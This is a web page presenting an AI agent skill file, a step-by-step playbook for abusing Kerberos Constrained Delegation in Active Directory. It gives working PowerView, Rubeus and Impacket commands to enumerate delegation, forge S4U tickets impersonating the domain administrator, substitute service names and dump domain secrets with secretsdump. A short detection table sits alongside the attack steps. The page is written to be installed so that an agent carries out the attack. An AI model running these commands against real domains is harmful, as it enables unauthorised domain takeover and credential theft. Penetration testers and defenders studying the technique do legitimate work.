Agent skill

exploiting-constrained-delegation-abuse

Exploit Kerberos Constrained Delegation misconfigurations in Active Directory to impersonate privileged users via S4U2self and S4U2proxy extensions for lateral movement and privilege escalation.

View SKILL.md on GitHub Repository
Stars 0
Forks 0

Install this agent skill to your Project

npx add-skill https://github.com/autohandai/community-skills/tree/main/exploiting-constrained-delegation-abuse

SKILL.md

Exploiting Constrained Delegation Abuse

Overview

Kerberos Constrained Delegation (KCD) is a Windows Active Directory feature that allows a service to impersonate a user and access specific services on their behalf. The delegation targets are defined in the msDS-AllowedToDelegateTo attribute. When an attacker compromises an account configured with Constrained Delegation (particularly with the TRUSTED_TO_AUTH_FOR_DELEGATION flag), they can use the S4U2self and S4U2proxy Kerberos protocol extensions to request service tickets as any user (including Domain Admins) to the delegated services. If the delegation target includes services like CIFS, HTTP, or LDAP on a Domain Controller, this results in full domain compromise. The S4U2self extension requests a forwardable ticket on behalf of any user to the compromised service, and S4U2proxy forwards that ticket to the allowed delegation target.

Objectives

  • Enumerate accounts with Constrained Delegation configured in the domain
  • Identify delegation targets (msDS-AllowedToDelegateTo) for high-value services
  • Exploit S4U2self and S4U2proxy to impersonate Domain Admin
  • Obtain service tickets for delegated services as a privileged user
  • Access delegated services (CIFS, LDAP, HTTP) on target hosts
  • Escalate to Domain Admin through Constrained Delegation abuse

MITRE ATT&CK Mapping

  • T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting
  • T1550.003 - Use Alternate Authentication Material: Pass the Ticket
  • T1134.001 - Access Token Manipulation: Token Impersonation/Theft
  • T1078.002 - Valid Accounts: Domain Accounts
  • T1021 - Remote Services

Implementation Steps

Phase 1: Enumerate Constrained Delegation

  1. Find accounts with Constrained Delegation using PowerView:
    powershell
    # Find users with Constrained Delegation
Get-DomainUser -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto

# Find computers with Constrained Delegation
Get-DomainComputer -TrustedToAuth | Select-Object samaccountname, msds-allowedtodelegateto

# Using AD Module
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo, userAccountControl
  2. Using Impacket findDelegation.py:
    bash
    findDelegation.py domain.local/user:'Password123' -dc-ip 10.10.10.1
  3. Using BloodHound CE:
    cypher
    MATCH (c) WHERE c.allowedtodelegate IS NOT NULL
RETURN c.name, c.allowedtodelegate
  4. Check for the TRUSTED_TO_AUTH_FOR_DELEGATION flag (protocol transition):
    powershell
    # UserAccountControl flag 0x1000000 = TRUSTED_TO_AUTH_FOR_DELEGATION
Get-DomainUser -TrustedToAuth | Select-Object samaccountname, useraccountcontrol

Phase 2: Exploit with Rubeus (Windows)

  1. If you have the password or hash of the constrained delegation account:
    powershell
    # Request TGT for the constrained delegation account
Rubeus.exe asktgt /user:svc_sql /domain:domain.local /rc4:<ntlm_hash>

# Perform S4U2self + S4U2proxy to impersonate administrator
Rubeus.exe s4u /ticket:<base64_tgt> /impersonateuser:administrator \
  /msdsspn:CIFS/DC01.domain.local /ptt

# Alternative: specify alternate service name
Rubeus.exe s4u /ticket:<base64_tgt> /impersonateuser:administrator \
  /msdsspn:CIFS/DC01.domain.local /altservice:LDAP /ptt
  2. Combined TGT request and S4U in single command:
    powershell
    Rubeus.exe s4u /user:svc_sql /rc4:<ntlm_hash> /impersonateuser:administrator \
  /msdsspn:CIFS/DC01.domain.local /domain:domain.local /ptt

Phase 3: Exploit with Impacket (Linux)

  1. Request service ticket via S4U protocol extensions:
    bash
    # Using getST.py with S4U
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
  -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'

# Using hash instead of password
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
  -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 \
  -dc-ip 10.10.10.1 domain.local/svc_sql

# Use the obtained ticket
export KRB5CCNAME=administrator.ccache
smbclient.py -k -no-pass domain.local/administrator@DC01.domain.local

Phase 4: Alternate Service Name Abuse

  1. Kerberos service tickets are not validated against the SPN in the ticket, allowing SPN substitution:
    bash
    # Request CIFS ticket, then use it for LDAP (DCSync)
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
  -altservice LDAP/DC01.domain.local \
  -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'

export KRB5CCNAME=administrator.ccache
secretsdump.py -k -no-pass domain.local/administrator@DC01.domain.local
  2. This technique works because the service name in the ticket is not cryptographically bound to the session key

Phase 5: Protocol Transition Attack

  1. If the account has TRUSTED_TO_AUTH_FOR_DELEGATION:
    bash
    # S4U2self obtains a forwardable ticket without requiring the user to authenticate
# This means we can impersonate ANY user without their password
getST.py -spn CIFS/DC01.domain.local -impersonate administrator \
  -dc-ip 10.10.10.1 domain.local/svc_sql:'ServicePass123'
  2. Without TRUSTED_TO_AUTH_FOR_DELEGATION, S4U2self tickets are non-forwardable and S4U2proxy will fail (unless using Resource-Based Constrained Delegation)

Tools and Resources

Tool Purpose Platform
Rubeus S4U Kerberos ticket manipulation Windows (.NET)
getST.py S4U service ticket requests (Impacket) Linux (Python)
findDelegation.py Delegation enumeration (Impacket) Linux (Python)
PowerView AD delegation enumeration Windows (PowerShell)
BloodHound CE Visual delegation path analysis Docker
Kekeo Advanced Kerberos toolkit Windows

Delegation Types Comparison

Type Attribute Scope Attack Complexity
Unconstrained TRUSTED_FOR_DELEGATION Any service Low (capture TGTs)
Constrained msDS-AllowedToDelegateTo Specific SPNs Medium (S4U abuse)
Constrained + Protocol Transition + TRUSTED_TO_AUTH_FOR_DELEGATION Specific SPNs Medium (no user auth needed)
Resource-Based (RBCD) msDS-AllowedToActOnBehalfOfOtherIdentity On target Medium (writable attribute)

Detection Signatures

Indicator Detection Method
S4U2self ticket requests Event 4769 with unusual service and impersonation
S4U2proxy forwarded tickets Event 4769 with delegation flags set
Alternate service name in ticket Mismatch between requested SPN and actual service access
Rubeus.exe execution EDR process detection, command-line logging
Delegation configuration changes Event 5136 for msDS-AllowedToDelegateTo modifications

Validation Criteria

  • Accounts with Constrained Delegation enumerated
  • Delegation targets (msDS-AllowedToDelegateTo) identified
  • S4U2self ticket obtained for target user
  • S4U2proxy ticket forwarded to delegation target
  • Privileged access to delegated service validated
  • Alternate service name substitution tested
  • Protocol transition capability assessed
  • Evidence documented with ticket exports and access proof

Recommended Agent Skills

Expand your agent's capabilities with these related and highly-rated skills.

autohandai/community-skills

mapping-mitre-attack-techniques

Maps observed adversary behaviors, security alerts, and detection rules to MITRE ATT&CK techniques and sub-techniques to quantify detection coverage and guide control prioritization. Use when building an ATT&CK-based coverage heatmap, tagging SIEM alerts with technique IDs, aligning security controls to adversary playbooks, or reporting threat exposure to executives. Activates for requests involving ATT&CK Navigator, Sigma rules, MITRE D3FEND, or coverage gap analysis.

0 0
Explore
autohandai/community-skills

hunting-for-spearphishing-indicators

Hunt for spearphishing campaign indicators across email logs, endpoint telemetry, and network data to detect targeted email attacks.

0 0
Explore
autohandai/community-skills

analyzing-malicious-url-with-urlscan

URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolat

0 0
Explore
autohandai/community-skills

implementing-zero-standing-privilege-with-cyberark

Deploy CyberArk Secure Cloud Access to eliminate standing privileges in hybrid and multi-cloud environments using just-in-time access with time, entitlement, and approval controls.

0 0
Explore
autohandai/community-skills

implementing-pam-for-database-access

Deploy privileged access management for database systems including Oracle, SQL Server, PostgreSQL, and MySQL. Covers session proxy configuration, credential vaulting, query auditing, dynamic credentia

0 0
Explore
autohandai/community-skills

detecting-t1003-credential-dumping-with-edr

Detect OS credential dumping techniques targeting LSASS memory, SAM database, NTDS.dit, and cached credentials using EDR telemetry, Sysmon process access monitoring, and Windows security event correlation.

0 0
Explore

Didn't find tool you were looking for?

Be as detailed as possible for better results